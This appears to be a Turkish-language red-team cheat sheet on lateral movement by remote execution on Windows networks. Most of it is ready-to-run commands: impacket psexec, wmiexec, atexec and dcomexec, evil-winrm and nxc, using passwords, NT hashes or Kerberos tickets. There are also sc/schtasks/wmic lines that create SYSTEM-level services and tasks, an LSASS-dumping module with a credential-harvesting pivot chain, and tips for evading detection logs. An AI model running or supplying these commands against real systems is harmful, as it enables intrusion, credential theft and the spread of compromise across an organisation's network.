Skip to content

Uzaktan Kod Çalıştırma Yöntemleri (PsExec/WMI/WinRM)

ATT&CK T1021 lateral movement

ATT&CK T1021 lateral movement

Geçerli bir kimlik (parola, NT hash veya Kerberos bileti) elde edildikten sonra, hedef makinede komut çalıştırmak için birkaç standart yöntem vardır. Her biri farklı port, servis ve iz bırakma profiline sahiptir. Amaç shell almak değil; doğru gürültü / erişim dengesiyle credential veya pivot üretmektir.

YöntemPort / bağımlılıkYetki
PsExec / smbexec445 SMB, Admin$ / C$Local admin
WMI / wmiexec135 + dynamic RPCLocal admin
DCOM135 + DCOMLocal admin
atexec445 (Task Scheduler)Local admin
WinRM5985 HTTP / 5986 HTTPSRemote Management Users / admin
SSH (Windows)22OpenSSH kurulu

BloodHound: AdminTo, CanPSRemote, CanRDP, ExecuteDCOM.

Terminal window
impacket-psexec domain.local/user:'Pass'@10.10.10.5
Terminal window
impacket-psexec -hashes :NTHASH domain.local/user@10.10.10.5
Terminal window
impacket-psexec -k -no-pass domain.local/user@host.domain.local
Terminal window
impacket-smbexec domain.local/user:'Pass'@10.10.10.5
Terminal window
impacket-wmiexec domain.local/user:'Pass'@10.10.10.5
Terminal window
impacket-wmiexec -hashes :NTHASH domain.local/user@10.10.10.5 'whoami /all'
Terminal window
impacket-atexec domain.local/user:'Pass'@10.10.10.5 'whoami'
Terminal window
impacket-atexec -hashes :NTHASH domain.local/user@10.10.10.5 'powershell -enc ...'
Terminal window
impacket-dcomexec domain.local/user:'Pass'@10.10.10.5
Terminal window
impacket-dcomexec -object MMC20 domain.local/user:'Pass'@10.10.10.5
Terminal window
evil-winrm -i 10.10.10.5 -u user -p 'Pass'
Terminal window
evil-winrm -i 10.10.10.5 -u user -H NTHASH
Terminal window
evil-winrm -i host.domain.local -u user -p 'Pass' -S # SSL 5986
Terminal window
nxc winrm 10.10.10.5 -u user -p 'Pass' -x 'whoami'
Terminal window
nxc winrm 10.10.10.5 -u user -H :NTHASH -X 'Get-Process'
Terminal window
Enter-PSSession -ComputerName host -Credential (Get-Credential)
Terminal window
Invoke-Command -ComputerName host -ScriptBlock { whoami } -Credential $cred
Terminal window
nxc smb 10.10.10.0/24 -u user -p 'Pass' -x 'hostname'
Terminal window
nxc smb 10.10.10.0/24 -u user -H :NTHASH -x 'whoami'
Terminal window
nxc smb 10.10.10.5 -u user -p 'Pass' -X 'Get-LocalGroupMember Administrators'
Terminal window
nxc smb 10.10.10.5 -u user -p 'Pass' --gen-relay-list relay.txt
Terminal window
nxc smb HOST -u user -H :HASH -M spider_plus
Terminal window
nxc smb HOST -u user -H :HASH -M lsassy
sc \\HOST create evilsvc binPath= "cmd /c ..."
sc \\HOST start evilsvc
schtasks /s HOST /tn evil /tr "cmd /c ..." /sc once /st 00:00 /ru SYSTEM /f
schtasks /s HOST /run /tn evil
wmic /node:HOST /user:DOMAIN\user /password:Pass process call create "cmd /c ..."
  1. Önce WinRM dene — interactive, dosya upload ( evil-winrm ), sık açık.

  2. WinRM kapalıysa wmiexec / atexec — servis yaratmadan komut.

  3. PsExec son çare — SYSTEM garanti ama Event 7045 + service IOC.

  4. Kerberos varsa -k — NTLM log azaltma; FQDN zorunlu.

  5. Firewall 445-only → smbexec/psexec; 135-only → wmi/dcom.

Remote Exec · impacket

embedded tool
Generated command
impacket-wmiexec domain.local/administrator:Pass123@10.10.10.5
nxc smb /24 -H → Pwn3d
→ wmiexec → comsvcs MiniDump
→ pypykatz → yeni hash
→ winrm jump → pivot
YöntemGürültüNot
psexecYüksekServis adı randomize et (impacket seçenekleri)
smbexecOrta-yüksekHâlâ servis
wmiexecOrtaWMI + Admin share output
atexecOrtaTask artefaktı
dcomexecOrtaDCOM şüpheli olabilir
winrmOrta5985 log; PowerShell Logging
  • Tek komut için atexec; interaktif için winrm/wmiexec.
  • -codec ibm437 / encoding sorunlarında Türkçe locale host’larda dikkat.
  • AMSI/ScriptBlock logging açık host’ta encoded command yine loglanır.
  • Admin hak yok ama WinRM “Authenticated Users” — CanPSRemote kontrol et.
  • UAC remote token filtering → local admin domain hesabı bazen “yüksek” token alamaz (LocalAccountTokenFilterPolicy); local admin veya DA kullan.
  • Kerberos + IP = fail.
  • SMB signing / firewall partial open → bir yöntem çalışır diğer ölür; hepsini dene.
  • evil-winrm gem/ssl hataları — -S veya winrm HTTP.

Pass-the-Hash · Pass-the-Ticket · LSASS Dumping · MSSQL